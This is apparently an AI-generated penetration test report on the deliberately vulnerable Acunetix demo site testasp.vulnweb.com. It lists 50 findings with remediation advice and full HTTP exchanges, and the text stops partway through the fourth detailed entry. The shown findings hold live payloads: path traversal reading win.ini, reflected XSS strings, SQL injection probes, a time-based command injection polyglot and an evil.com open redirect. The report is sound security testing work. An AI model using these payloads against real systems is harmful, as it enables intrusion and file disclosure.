SILENTCHAIN Professional
Penetration Test Report
AI-Driven Vulnerability Assessment
Target(s)
testasp.vulnweb.com
Report Generated
2026-07-20 09:17:33
AI Provider
ClaudeCode
Model
fable-5
Tool Version
SILENTCHAIN PRO v2.0.34
Total Findings
50

Executive Summary

This report summarises findings identified by SILENTCHAIN Professional, an AI-driven vulnerability discovery and active-verification extension for Burp Suite. Severity reflects AI-evaluated impact; confidence reflects evidence strength. Findings flagged as Verified have been actively confirmed through Phase 2 payload delivery.

50
Total
26
High
12
Medium
10
Low
2
Info
18
Verified

Top Findings

Select a finding title to jump to its detailed entry. A complete index is in the Finding Glossary.

#SeverityConfidenceTitleURLCWE
1HighCertainPath Traversal / Local File Inclusionhttp://testasp.vulnweb.com/Templatize.asp?item=..%5C..%5C..%5Cwindows%5Cwin.iniCWE-22
2HighCertainPath Traversal / Local File Inclusionhttp://testasp.vulnweb.com/Templatize.asp?item=..%5C..%5Cwindows%5Cwin.iniCWE-22
3HighTentativePath traversal / local file inclusion in 'item' parameterhttp://testasp.vulnweb.com/Templatize.asp?item=html/about.htmlCWE-22
4HighCertainOS Command Injectionhttp://testasp.vulnweb.com/showforum.asp?id=0CWE-78
5HighCertainCross-Site Scripting (Reflected)http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cmarquee%20onstart%3Dalert%281%29%3ECWE-79
6HighCertainCross-Site Scripting (Reflected)http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cinput%20onfocus%3Dalert%281%29%20autofocus%3ECWE-79
7HighCertainCross-Site Scripting (Reflected)http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbody%20onload%3Dalert%281%29%3ECWE-79
8HighCertainCross-Site Scripting (Reflected)http://testasp.vulnweb.com/Search.asp?tfSearch=%3Csvg%2Fonload%3Dalert%281%29%3ECWE-79
9HighCertainCross-Site Scripting (Reflected)http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%3Ealert%281%29%3C%2Fscript%3ECWE-79
10HighCertainCross-Site Scripting (Reflected)http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3ECWE-79

Scan Metrics

HTTP Responses Observed97073
AI Analyses17
Findings Created50
Target(s)testasp.vulnweb.com

Findings by Category

50 findings consolidated into 20 weakness categories (severity × CWE). Select a count to jump to that group in the findings below.

SeverityCWECategoryFindings
HighCWE-89SQL Injection12
HighCWE-79Cross-Site Scripting10
HighCWE-22Path Traversal3
HighCWE-78OS Command Injection1
MediumCWE-601Open Redirect4
MediumCWE-22Path Traversal2
MediumCWE-1004Sensitive Cookie Without HttpOnly Flag1
MediumCWE-1104n/a1
MediumCWE-319Cleartext Transmission of Sensitive Information1
MediumCWE-614Sensitive Cookie Without Secure Attribute1
MediumCWE-79Cross-Site Scripting1
MediumCWE-89SQL Injection1
LowCWE-601Open Redirect3
LowCWE-22Path Traversal2
LowCWE-352Cross-Site Request Forgery2
LowCWE-200Exposure of Sensitive Information1
LowCWE-384n/a1
LowCWE-693Protection Mechanism Failure1
Informationn/aUncategorized1
InformationCWE-209Information Exposure Through an Error Message1

Finding Glossary

Complete index of all 50 findings, ordered by severity. Select a finding to jump straight to its detailed entry below.

#SeverityConfidenceFindingURLCWE
1HighCertainPath Traversal / Local File Inclusion http://testasp.vulnweb.com/Templatize.asp?item=..%5C..%5C..%5Cwindows%5Cwin.iniCWE-22
2HighCertainPath Traversal / Local File Inclusion http://testasp.vulnweb.com/Templatize.asp?item=..%5C..%5Cwindows%5Cwin.iniCWE-22
3HighTentativePath traversal / local file inclusion in 'item' parameterhttp://testasp.vulnweb.com/Templatize.asp?item=html/about.htmlCWE-22
4HighCertainOS Command Injection http://testasp.vulnweb.com/showforum.asp?id=0CWE-78
5HighCertainCross-Site Scripting (Reflected) http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cmarquee%20onstart%3Dalert%281%29%3ECWE-79
6HighCertainCross-Site Scripting (Reflected) http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cinput%20onfocus%3Dalert%281%29%20autofocus%3ECWE-79
7HighCertainCross-Site Scripting (Reflected) http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cbody%20onload%3Dalert%281%29%3ECWE-79
8HighCertainCross-Site Scripting (Reflected) http://testasp.vulnweb.com/Search.asp?tfSearch=%3Csvg%2Fonload%3Dalert%281%29%3ECWE-79
9HighCertainCross-Site Scripting (Reflected) http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%3Ealert%281%29%3C%2Fscript%3ECWE-79
10HighCertainCross-Site Scripting (Reflected) http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3ECWE-79
11HighCertainCross-Site Scripting (Reflected) http://testasp.vulnweb.com/Search.asp?tfSearch=%3Cimg%20src%3Dx%20onerror%3Dalert%281%29%3ECWE-79
12HighFirmReflected XSS in 'tfSearch' parameterhttp://testasp.vulnweb.com/Search.asp?tfSearch=testCWE-79
13HighCertainStored/Reflected XSS via image 'onerror' handler in forum posthttp://testasp.vulnweb.com/showthread.asp?id=4CWE-79
14HighTentativeStored/persistent XSS via unencoded forum post contenthttp://testasp.vulnweb.com/showthread.asp?id=0CWE-79
15HighTentativePossible SQL injection in 'id' parameterhttp://testasp.vulnweb.com/showforum.asp?id=0CWE-89
16HighCertainSQL Injection http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2CWE-89
17HighCertainSQL Injection http://testasp.vulnweb.com/showforum.asp?id=2%20AND%201%3D2CWE-89
18HighCertainSQL Injection http://testasp.vulnweb.com/showthread.asp?id=4%20AND%201%3D2CWE-89
19HighCertainSQL Injection http://testasp.vulnweb.com/showthread.asp?id=0%20AND%201%3D2CWE-89
20HighCertainSQL Injection http://testasp.vulnweb.com/showthread.asp?id=1%20AND%201%3D2CWE-89
21HighCertainSQL Injection http://testasp.vulnweb.com/showforum.asp?id=0CWE-89
22HighCertainSQL Injection http://testasp.vulnweb.com/showforum.asp?id=0%20AND%201%3D2CWE-89
23HighFirmSQL Injection in 'tfUName'/'tfUPass' login parametershttp://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2CWE-89
24HighTentativeSQL injection in 'id' parameter of showthread pagehttp://testasp.vulnweb.com/showthread.asp?id=1CWE-89
25HighTentativeSQL injection in 'tfSearch' parameterhttp://testasp.vulnweb.com/Search.asp?tfSearch=testCWE-89
26HighTentativeSuspected SQL injection in 'id' parameter of forum lookuphttp://testasp.vulnweb.com/Default.aspCWE-89
27MediumCertainSession cookie set without HttpOnly, Secure, or SameSite flagshttp://testasp.vulnweb.com/Templatize.asp?item=html/about.htmlCWE-1004
28MediumCertainOutdated JavaScript library: TinyMCE 2.0RC4 (2005)http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.jsCWE-1104
29MediumTentativePath traversal / local file inclusion candidate in 'item' parameterhttp://testasp.vulnweb.com/Search.asp?tfSearch=testCWE-22
30MediumTentativeSuspected path traversal / local file inclusion in 'item' parameterhttp://testasp.vulnweb.com/Default.aspCWE-22
31MediumFirmCleartext transmission of session over HTTPhttp://testasp.vulnweb.com/Search.asp?tfSearch=testCWE-319
32MediumCertainOpen Redirect http://testasp.vulnweb.com/Login.asp?RetURL=%2F%5Cevil.comCWE-601
33MediumTentativeOpen redirect / unvalidated redirect via 'RetURL' parameterhttp://testasp.vulnweb.com/showforum.asp?id=0CWE-601
34MediumTentativeOpen redirect via 'RetURL' parameter on loginhttp://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2CWE-601
35MediumTentativeSuspected open redirect in 'RetURL' parameterhttp://testasp.vulnweb.com/Default.aspCWE-601
36MediumCertainSession cookie transmitted over cleartext HTTP without Secure/HttpOnly flagshttp://testasp.vulnweb.com/Search.asp?tfSearch=testCWE-614
37MediumTentativeReflected SQL-injection payload / unencoded username in page bodyhttp://testasp.vulnweb.com/showforum.asp?id=2CWE-79
38MediumTentativeSuspected SQL injection in 'id' parameter of showforum.asphttp://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2CWE-89
39LowFirmServer and technology version disclosure via response headershttp://testasp.vulnweb.com/Search.asp?tfSearch=testCWE-200
40LowTentativePath traversal / local file inclusion candidate in 'item' parameterhttp://testasp.vulnweb.com/showthread.asp?id=1CWE-22
41LowTentativePossible path traversal / local file inclusion via 'item' parameterhttp://testasp.vulnweb.com/showforum.asp?id=0CWE-22
42LowTentativeLogin form lacks anti-CSRF tokenhttp://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2CWE-352
43LowTentativeMessage-post form lacks anti-CSRF tokenhttp://testasp.vulnweb.com/showforum.asp?id=2CWE-352
44LowTentativeProliferation of ASP session cookies indicating session management weaknesshttp://testasp.vulnweb.com/Templatize.asp?item=html/about.htmlCWE-384
45LowTentativeOpen redirect / external URL parameter 'RetURL'http://testasp.vulnweb.com/Search.asp?tfSearch=testCWE-601
46LowTentativeOpen redirect candidate in 'RetURL' parameterhttp://testasp.vulnweb.com/showthread.asp?id=1CWE-601
47LowTentativeSuspected open redirect via 'RetURL' return-URL parameterhttp://testasp.vulnweb.com/Templatize.asp?item=html/about.htmlCWE-601
48LowFirmMissing security response headershttp://testasp.vulnweb.com/Search.asp?tfSearch=testCWE-693
49InformationTentativeInternal Server Error Triggered by Benign Form Submissionhttp://testasp.vulnweb.com/showforum.asp?id=2CWE-209
50InformationFirmWAF Detected: F5http://testasp.vulnweb.com/showthread.asp?id=1n/a

Methodology

SILENTCHAIN Professional combines passive traffic analysis, AI-driven discovery, and active payload verification to identify and confirm web vulnerabilities. Findings in this report were produced via the following pipeline:

Phase 1 - AI Discovery

Every in-scope HTTP request observed in Burp Proxy/Repeater/Scanner traffic is analysed by an LLM (provider/model recorded on the cover page). The model reviews request method, parameters, headers, cookies, and the response body for signs of common OWASP Top 10 weaknesses.

Phase 2 - Active Verification

Findings in injection-class CWEs (SQLi, XSS, command injection, SSTI, SSRF, XXE, LFI, open redirect, IDOR, LDAP injection, NoSQL injection) are escalated to active verification. SILENTCHAIN delivers a curated payload battery directly against the candidate parameter and applies heuristic + AI evaluation of the response. Verified findings have their confidence upgraded (Tentative → Firm/Certain) and carry a reproducible proof-of-concept payload plus a heuristic detection rationale.

RAG Knowledge Augmentation

The optional RAG Security Knowledge Engine supplies relevant exploitation context to Phase 1 discovery prompts. The KB indexes OWASP Top 10, CWE Top 25, Exploit-DB source, NVD CVEs, SecLists payloads, PayloadsAllTheThings, and (when configured) organisation-specific scan history.

WAF Detection

Phase 2 short-circuits on hosts where a WAF block pattern is detected to avoid generating noise that would also poison subsequent passive analysis on the same host.

Severity, Confidence, and Triage

Severity follows the Burp Scanner convention: High (direct compromise), Medium (significant risk requiring chained exploitation or specific context), Low (informational-with-impact), Information (observation without direct impact). Confidence is Certain (active proof), Firm (strong indicators), Tentative (heuristic suggestion). All findings are emitted to the standard Burp Findings panel.

Findings

High CWE-22 - Path Traversal 3 findings

↩ Glossary1. Path Traversal / Local File Inclusion ✓ PHASE 2 VERIFIED
Severity: High  |  Confidence: Certain  |  CWE: CWE-22 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-18 20:28:55
URL
http://testasp.vulnweb.com/Templatize.asp?item=..%5C..%5C..%5Cwindows%5Cwin.ini
Vulnerable Parameter
item
Detail
LFI signature detected: [extensions]
Payload
..\..\..\windows\win.ini
Detection Heuristic
LFI signature detected: [extensions]
AI Confidence
95%
HTTP Request
Full request
GET /Templatize.asp?item=..%5C..%5C..%5Cwindows%5Cwin.ini HTTP/1.1
Host: testasp.vulnweb.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="144", "Not=A?Brand";v="8", "Chromium";v="144"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=MMJLKFOBEBIEBCHHICAPOPGI; path=/
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 00:28:55 GMT
Connection: close
Content-Length: 2761


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>Untitled Document</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3D%2E%2E%255C%2E%2E%255C%2E%2E%255Cwindows%255Cwin%2Eini" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3D%2E%2E%255C%2E%2E%255C%2E%2E%255Cwindows%255Cwin%2Eini" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
		; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

		<!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Path traversal (directory traversal) and file inclusion arise when user input is used to build a filesystem path or an inclusion target without proper validation, allowing an attacker to escape the intended directory using traversal sequences (../, encoded variants, absolute paths). This grants read access to arbitrary files - application source code, configuration and credential files, /etc/passwd, Java WEB-INF/web.xml, framework secrets - and, where the target is included or executed, can lead to remote code execution.

The disclosed material (source, keys, connection strings, tokens) frequently enables a far more serious follow-on compromise, so the issue is treated as high severity even when it appears to "only" read files.

Remediation

Remove user control over the filesystem path:

  • Avoid passing user input to filesystem APIs. Where possible map an opaque identifier to a server-side path via a fixed lookup table.
  • Canonicalise and verify containment - resolve the requested path to its canonical absolute form and confirm it is still inside the intended base directory before opening it; reject otherwise.
  • Strict allow-list validation of the filename (e.g. a known set of names, or [A-Za-z0-9_-] with a fixed extension); decode once and reject traversal sequences and null bytes.
  • Disable remote/dynamic inclusion (e.g. PHP allow_url_include) and run with least filesystem privilege.
↩ Glossary2. Path Traversal / Local File Inclusion ✓ PHASE 2 VERIFIED
Severity: High  |  Confidence: Certain  |  CWE: CWE-22 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-18 20:28:55
URL
http://testasp.vulnweb.com/Templatize.asp?item=..%5C..%5Cwindows%5Cwin.ini
Vulnerable Parameter
item
Detail
LFI signature detected: [extensions]
Payload
..\..\windows\win.ini
Detection Heuristic
LFI signature detected: [extensions]
AI Confidence
95%
HTTP Request
Full request
GET /Templatize.asp?item=..%5C..%5Cwindows%5Cwin.ini HTTP/1.1
Host: testasp.vulnweb.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="144", "Not=A?Brand";v="8", "Chromium";v="144"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=LMJLKFOBILBAIPJMPPAINNEG; path=/
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 00:28:55 GMT
Connection: close
Content-Length: 2739


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>Untitled Document</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3D%2E%2E%255C%2E%2E%255Cwindows%255Cwin%2Eini" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3D%2E%2E%255C%2E%2E%255Cwindows%255Cwin%2Eini" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
		; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1

		<!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Path traversal (directory traversal) and file inclusion arise when user input is used to build a filesystem path or an inclusion target without proper validation, allowing an attacker to escape the intended directory using traversal sequences (../, encoded variants, absolute paths). This grants read access to arbitrary files - application source code, configuration and credential files, /etc/passwd, Java WEB-INF/web.xml, framework secrets - and, where the target is included or executed, can lead to remote code execution.

The disclosed material (source, keys, connection strings, tokens) frequently enables a far more serious follow-on compromise, so the issue is treated as high severity even when it appears to "only" read files.

Remediation

Remove user control over the filesystem path:

  • Avoid passing user input to filesystem APIs. Where possible map an opaque identifier to a server-side path via a fixed lookup table.
  • Canonicalise and verify containment - resolve the requested path to its canonical absolute form and confirm it is still inside the intended base directory before opening it; reject otherwise.
  • Strict allow-list validation of the filename (e.g. a known set of names, or [A-Za-z0-9_-] with a fixed extension); decode once and reject traversal sequences and null bytes.
  • Disable remote/dynamic inclusion (e.g. PHP allow_url_include) and run with least filesystem privilege.
↩ Glossary3. Path traversal / local file inclusion in 'item' parameter
Severity: High  |  Confidence: Tentative  |  CWE: CWE-22 [ref]  |  OWASP: A01:2021  |  Discovered: 2026-07-18 20:28:45
URL
http://testasp.vulnweb.com/Templatize.asp?item=html/about.html
Detail
The GET request to /Templatize.asp passes item=html/about.html, a parameter whose value is a relative file path that the template script appears to load and render into the response. Because the value is a path fragment fed to a file/template include, an attacker could supply traversal sequences (e.g. ../../windows/win.ini) or an absolute path to read arbitrary files on the IIS host. Exploitation is not confirmed from this single benign request, but the parameter's role as a filename makes it a strong path-traversal/LFI candidate.
AI Confidence
72%
Evidence
url: /Templatize.asp?item=html/about.html ; params_sample item (type URL) = "html/about.html"
HTTP Request
Full request
GET /Templatize.asp?item=html/about.html HTTP/1.1
Host: testasp.vulnweb.com
Cache-Control: max-age=0
Sec-Ch-Ua: "Google Chrome";v="144", "Not=A?Brand";v="8", "Chromium";v="144"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Connection: close

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=NLILKFOBIKABBNEPOHMKBOEH; path=/
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 00:27:56 GMT
Connection: close
Content-Length: 4594


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>Untitled Document</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FTemplatize%2Easp%3Fitem%3Dhtml%2Fabout%2Ehtml" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
		<h1>About this website</h1>
<p>The website was built with the intention to test the Acunetix Web Vulnerability
Scanner. For this reason this website have <b>lot of bugs</b> to demonstrate
the forementioned software's capabilities to find those bugs.</p>
<p><b>Please DO NOT use this website as a forum site. DO NOT post any sensitive
information on this site. This includes e-mail addresses or real names.</b></p>
<h1>About Acunetix</h1>
<P><B>Combating the web vulnerability threat<BR>
	</B>Securing a company's web applications is today's most overlooked aspect of 
	securing the enterprise. Web application hacking is on the rise with as many as 
	75% of cyber attacks done at web application level or via the web. Most 
	corporations have secured their data at the network level, but have overlooked 
	the crucial step of checking whether their web applications are vulnerable to 
	attack. Web applications, which often have a direct line into the company's 
	most valuable data assets, are online 24/7, completely unprotected by a 
	firewall and therefore easy prey for attackers.</P>
<P>Acunetix was founded with this threat in mind. We realised the only way to 
	combat web site hacking was to develop an automated tool that could help 
	companies scan their web applications for vulnerabilities. In July 2005, 
	Acunetix Web Vulnerability Scanner was released - a tool that crawls the 
	website for vulnerabilities to SQL injection, cross site scripting and other 
	web attacks before hackers do.</P>
<P>The Acunetix development team consists of highly experienced security developers 
	who have each spent years developing network security scanning software prior 
	to starting development on Acunetix WVS. The management team is backed by years 
	of experience marketing and selling security software.</P>
<P>Acunetix is a privately held company with its <A href="http://www.acunetix.com/company/contact.htm">
		offices</A> in Malta, US and the UK.<BR>
</P>
		<!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Path traversal (directory traversal) and file inclusion arise when user input is used to build a filesystem path or an inclusion target without proper validation, allowing an attacker to escape the intended directory using traversal sequences (../, encoded variants, absolute paths). This grants read access to arbitrary files - application source code, configuration and credential files, /etc/passwd, Java WEB-INF/web.xml, framework secrets - and, where the target is included or executed, can lead to remote code execution.

The disclosed material (source, keys, connection strings, tokens) frequently enables a far more serious follow-on compromise, so the issue is treated as high severity even when it appears to "only" read files.

Remediation

Remove user control over the filesystem path:

  • Avoid passing user input to filesystem APIs. Where possible map an opaque identifier to a server-side path via a fixed lookup table.
  • Canonicalise and verify containment - resolve the requested path to its canonical absolute form and confirm it is still inside the intended base directory before opening it; reject otherwise.
  • Strict allow-list validation of the filename (e.g. a known set of names, or [A-Za-z0-9_-] with a fixed extension); decode once and reject traversal sequences and null bytes.
  • Disable remote/dynamic inclusion (e.g. PHP allow_url_include) and run with least filesystem privilege.

High CWE-78 - OS Command Injection 1 finding

↩ Glossary4. OS Command Injection ✓ PHASE 2 VERIFIED
Severity: High  |  Confidence: Certain  |  CWE: CWE-78 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-19 11:39:02
URL
http://testasp.vulnweb.com/showforum.asp?id=0
Vulnerable Parameter
ASPSESSIONIDCSDDASDC
Detail
Time-based blind injection: response took 5843ms (baseline 156ms, delta 5687ms)
Payload
;ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #' ;ping -n 21 127.0.0.1||`ping -c 21 127.0.0.1` #" ;ping -n 21 127.0.0.1
Detection Heuristic
Time-based blind injection: response took 5843ms (baseline 156ms, delta 5687ms)
AI Confidence
95%
HTTP Request
Full request
GET /showforum.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Default.asp
Accept-Encoding: gzip, deflate, br
